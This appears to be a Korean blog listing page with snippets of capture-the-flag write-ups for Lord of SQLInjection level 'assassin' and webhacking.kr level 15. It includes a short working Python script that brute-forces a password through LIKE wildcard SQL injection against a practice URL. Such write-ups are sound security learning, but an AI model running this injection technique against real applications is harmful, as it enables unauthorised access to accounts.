LOS :: 15번 ASSASSIN WRITE UP 12345678910111213import requests url = "http://los.rubiya.kr/assassin_14a1fd552c61c60f034879e5d4171373.php"session = {'PHPSESSID':'MY_SESSION'}data = {} for j in range(48,127): data['pw']="%0"+chr(j)+"%" res = requests.get(url, params=data, cookies=session) if "Hello admin" in res.text: print("[♪] ASSASSIN Clear!") break Colored by Color Scriptercs Wargame/LOS(rubiya) 7년 전
[LOS]15번 assassin 좀 멋있는 친구가 나타났다 클릭해보자 like가 고정되어있고 쿼터가 막혀있기 때문에 보이는 그대로 like를 이용해야 할것같다. (http://g0pher.tistory.com/182) %%를 입력하니 guest가 뜬다. 첫글자부터 하나씩 찾아야 한다는 건데 출제자가 admin과 guest의 pw를 앞 몇글자가 동일하도록 만들어놓았을것 같다. 꽁으로 문제를 주진 않았을테니까? 코딩을 하자 12345678910111213141516import requests URL = 'http://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php'head={ 'cookie' : 'PHPSESSID=r3k3; __cfduid=d437' } for i in .. Wargame/LOS(eagle-jump) 8년 전
[Webhacking.kr]15번 15번을 눌렀을때 뜨는 경고창이다. 접근불허라고 뜨며 확인버튼을 누를 시 아주 잠시 다른 페이지로 이동했다가 다시 원래페이지로 돌아온다. 이 잠깐이라는 시간에 슬쩍 보인 글자들은 키를 의미하는 것이었다. 이를 풀기위해서 아주 간단하게 캡쳐를 통해서 문제를 풀어낼 수 있고, 버프슈트를 이용해서 들어오는 http응답패킷을 잡아 html을 분석해볼 수 있다. Wargame/webhacking.kr 8년 전